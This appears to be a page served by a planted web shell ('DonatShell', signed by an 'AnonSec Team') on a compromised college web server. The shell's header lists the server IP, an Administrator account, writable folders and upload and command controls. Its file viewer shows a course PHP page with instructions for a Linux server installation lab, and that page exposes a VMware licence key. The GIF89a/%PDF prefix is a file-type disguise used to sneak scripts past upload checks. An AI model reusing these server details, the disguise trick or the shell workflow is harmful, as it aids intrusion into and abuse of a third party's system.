GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST2608/_Archive/Labs/Lab01/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST2608/_Archive/Labs/Lab01/Lab01.phpinc
<?
// Lab01.php

include('Course/courseInfo.phpinc');
include('../../classInfo.phpinc');

$assignmentNumber = 1;
$assignmentType = "Lab";
$assignmentTitle = "Install Ubuntu Linux Server";
$assignmentName = $assignmentType." ".$assignmentNumber;
$evaluationType = "Lab";
$evaluationTitle = $assignmentTitle;
if ( strlen($assignmentNumber) == 1 ) {  $evaluationName = $evaluationType."0".$assignmentNumber; } else { $evaluationName = $evaluationType.$assignmentNumber; }

$title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle;
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$smallTitle = true;
$js='openCenteredWindow';
#$displayHeader = false;
include('common/pageHeader.phpinc');
include('JimMartinson/CST2608/Labs/StudentServerNameNAT.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title.' - '.username($userId);
include('common/sectionHeader.phpinc');
?>
<p>
<fieldset><legend>Description</legend>
Install Ubuntu server (linux variant) and begin to become familiar with the server.
</fieldset>

<fieldset><legend>Lab Instruction</legend>
<ol start="1">
  <li>Install Ubuntu Linux Server.
  	<ol type="a">
    	<li>Download and install <a href="/JimMartinson/Setup/VMware/VMwareWorkstation9/VMware-workstation-full-9.0.2-1031769.exe">Vmware workstation 9.0.2 <span  style="white-space:nowrap;">(VMware-workstation-full-9.0.2-1031769.exe)</span></a>.
      <br />The registration key is: <b>4568Q-Q5144-18V04-C8A06-09XQP</b>.
      <!--
			<br /><a href="/JimMartinson/Setup/VMware/VMwareInstall.avi">View VMware installation video</a>. NOTE: You may need to download and install the <a href="/JimMartinson/Setup/TechSmithCodec/tscc.exe">TechSmith Screen Capture Codec (TSCC)</a> to view the recording. If Windows 7 displays a "This program might not have installed correctly" message during the install click on "Reinstall using recommended settings".
			-->
			</li>
      <li>Download the Ubuntu Linux Server 12.04 <a href="/JimMartinson/CST2608/dn/Ubuntu/ubuntu-12.04.3-server-amd64.iso"><span style="white-space:nowrap;">ubuntu-12.04.3-server-amd64.iso</span></a> or <a href="/JimMartinson/CST2608/dn/Ubuntu/ubuntu-12.04.3-server-i386.iso"><span style="white-space:nowrap;">ubuntu-12.04.3-server-i386.iso</span></a> iso image. Note: If you have an AMD 64 bit processor you must use the <a href="/JimMartinson/CST2608/dn/Ubuntu/ubuntu-12.04.3-server-amd64.iso"><span style="white-space:nowrap;">ubuntu-12.04.3-server-amd64.iso</span></a> iso image.
			</li>
      <li>Create a new Linux Virtual Machine.
				<br><a href="/JimMartinson/CST2608/Labs/Lab01/VMware/">( See how to create a New Virtual Machine )</a>
			</li>
      <li>Make sure the CD-ROM setting of the virtual machine is set to the <b>ubuntu-8.04.1-server-i386.iso</b> file and start the virtual machine.</li>
      <li>Install Ubuntu server.<!-- <a href="/JimMartinson/CST2608/Labs/Lab01/ServerInstall/">See Ubuntu server installation instructions</a>-->.</li>
    </ol>
  </li>
	<li>
    	From a terminal window, enter the following commands:<br />
      <pre class="kbd">clear
uname -a
cat /etc/lsb-release</pre>
    </li>
    <li>
      Take a screenshot of the Terminal window and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFileName?>.png</b>.
			<br><a href="SeeHowToOpenTerminalWindowAndTakeScreenShot">( See how to open a terminal window and take a Screenshot )</a>
      <br>I require the image to be in .png format. An example screenshot:
      <br /><img src="/JimMartinson/CST2608/Labs/Lab01/images/Ubuntu_uname.png" alt="Ubuntu login" />
    </li>
    <li>Install the Ubuntu desktop.
      <ol type="a">
      	<li>Update the server with the command:
	        <br /><kbd>sudo apt-get update</kbd>
      	<li>Install the desktop with the command: (This took over 2 hrs at home)
	        <br /><kbd>sudo apt-get install ubuntu-desktop</kbd>
        </li>
      </ol>
    </li>
		<li>
			Install VMware Tools.
			<br /><a href="/JimMartinson/CST2608/Labs/Lab01/VMtoolsInstall/Ubuntu_VMtools_Install.avi">View VMtools installation video</a>.
		</li>
    <li>
      Restart your server and take a screenshot of the login screen and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFileName?>.png</b>.
      <br />I require the image to be in .png format. An example screenshot:
      <br /><img src="/JimMartinson/CST2608/Labs/Lab01/images/Ubuntu_login.png" alt="Ubuntu login" />
    </li>
    <li>
     	<a href="mailto:jim.martinson@ridgewater.edu?subject=<?=$courseNumber?> <?=$evaluationName?> Submission">Send an email</a> to jim.martinson@ridgewater.edu with a subject of <b style="white-space:nowrap"><?=$courseNumber?> <?=$evaluationName?> Submission</b> and attach the following files:
      <ol type="a">
      	<li><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFileName?>.png.</li>
      	<li><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFileName?>.png.</li>
      </ol>
    </li>
</ol>
</fieldset>

<fieldset class="pio"><legend>Grading Criteria</legend>
Demonstrated assignment effectively: 10 points.
<br />
There are some things I expect. If they are incorrect you will lose the following:
<br />
Incorrect attachment file name: -1 pt.
<br />
Work submitted incorrectly: -1pt.
<br />
Incorrect subject in email: -1pt.
<br />
Second and subsequent submission of work for grading: -1pt.
<br />
Work submitted late: -1pt per week.
</fieldset>

<!--
<fieldset class="pio"><legend>Objectives</legend>
<ol class="obj pio" start="3">
	<li>Install Linux server.</li>
</ol>
</fieldset>
<fieldset><legend>Notes</legend>
Here is a <a href="/JimMartinson/CST2608/Labs/<?=$evaluationName?>/<?=$evaluationName?>.zip"><?=$evaluationName?>.zip</a> file with examples of what must be turned in as well as gedit and sudo scripts to help with the assignment.<br />
<?
#include('LabNotes.phpinc');
?>
</fieldset>
-->

<?
include('../../ReferencesResources.phpinc');
include('common/sectionFooter.phpinc');
include('common/pageFooter.phpinc');
?>

Anon7 - 2022
AnonSec Team